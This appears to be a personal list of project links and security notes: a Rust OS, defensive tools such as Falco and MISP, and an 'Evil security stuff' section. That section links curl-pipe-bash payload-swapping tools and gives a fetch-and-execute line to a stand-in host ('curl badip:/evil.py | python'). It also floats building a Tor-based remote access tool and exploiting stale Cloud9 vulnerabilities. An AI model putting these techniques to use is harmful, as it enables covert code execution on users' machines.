- cool firefly algorithm
- https://github.com/cretz/bine (for tor controllers)
- https://github.com/phil-op/blog_os - a rust OS
- elasticsearch alternative: https://github.com/prabhatsharma/zinc
- JC (like JQ)
- https://addons.mozilla.org/en-US/firefox/addon/trackerless-magnets/?src=external-addonsbadge-daniel.priv.no
Good security stuff
- Falco
- Auditd
- SecurityOnion
- MISP
- TheHive
- Cilium
- path prevention analysis - lengthen opportunities to stop, rebuild faster than zero day, “prevention is nice. detection is essential” @sechubb, @anthomsec, @arekfurt
Evil security stuff
- detecting whether a user isn’t paying attention to what they’ve just downloaded:
- https://web.archive.org/web/20211116150123/https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/
- https://code.moparisthebest.com/moparisthebest/curl_bash/src/branch/master/src/main.rs
- https://github.com/mokytis/curlbash
- https://github.com/4iar/evil-pipe
- https://github.com/MylesJohnson/Pipe-Injector
- could also use sponge to try to thwart it but honestly then it gets into honeypot cat and mouse games (arg where’s that article…)
- detecting honeypots
- in memory filesystem (e.g., curl badip:/evil.py | python) - could use https://github.com/cretz/bine for a simple remote access tool
- kdelfour/cloud9-ide probably has enough stale vulns by this point to be tractable
misc
- abi crashed? then use qemu-chroot of the most stable version to serve the network device